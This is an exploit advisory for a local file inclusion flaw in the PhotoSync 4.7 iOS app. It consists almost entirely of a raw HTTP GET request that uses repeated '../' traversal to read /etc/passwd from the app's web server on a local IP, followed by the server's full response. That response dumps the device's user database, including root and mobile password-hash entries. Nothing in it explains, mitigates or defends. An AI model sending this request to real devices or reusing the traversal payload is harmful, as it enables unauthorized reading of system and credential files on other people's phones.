PhotoSync 4.7 Local File Inclusion

`# Exploit Title: PhotoSync 4.7 IOS APP Local file inclusion  
# Date: Sep 19, 2022  
# Exploit Author: Chokri Hammedi  
# Vendor Homepage: https://www.photosync-app.com/home.html  
# Software Link:  
https://apps.apple.com/us/app/photosync-transfer-photos/id415850124  
# Version: 4.7  
# Tested on: iPhone IOS 16.0  
  
  
GET /../../../../../../../../../../../../../../../etc/passwd HTTP/1.1  
Host: 192.168.8.101:8080  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)  
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e  
Safari/8536.25  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
  
-------  
  
HTTP/1.1 200 OK  
Date: Mon, 19 Sep 2022 06:35:11 GMT  
Accept-Ranges: bytes  
Content-Length: 2791  
  
##  
# User Database  
#  
# This file is the authoritative user database.  
##  
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false  
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh  
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh  
daemon:*:1:1:System Services:/var/root:/usr/bin/false  
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false  
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false  
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false  
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false  
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false  
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false  
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false  
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false  
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false  
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false  
_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false  
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false  
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false  
_ondemand:*:249:249:On Demand Resource  
Daemon:/var/db/ondemand:/usr/bin/false  
_findmydevice:*:254:254:Find My Device  
Daemon:/var/db/findmydevice:/usr/bin/false  
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false  
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false  
_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false  
_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false  
_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false  
_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false  
_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false  
_diskimagesiod:*:271:271:DiskImages IO  
Daemon:/var/db/diskimagesiod:/usr/bin/false  
_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false  
_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false  
_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false  
_accessoryupdater:*:278:278:Accessory Update  
Daemon:/var/db/accessoryupdater:/usr/bin/false  
_knowledgegraphd:*:279:279:Knowledge Graph  
Daemon:/var/db/knowledgegraphd:/usr/bin/false  
_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false  
_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false  
_trustd:*:282:282:trustd:/var/empty:/usr/bin/false  
_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false  
_darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false  
_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false  
_backboardd:*:287:287:BackBoard:/var/empty:/usr/bin/false  
_avphidbridge:*:288:288:Apple Virtual Platform HID  
Bridge:/var/empty:/usr/bin/false  
_launchservices:*:290:290:Launch Services:/var/empty:/usr/bin/false  
`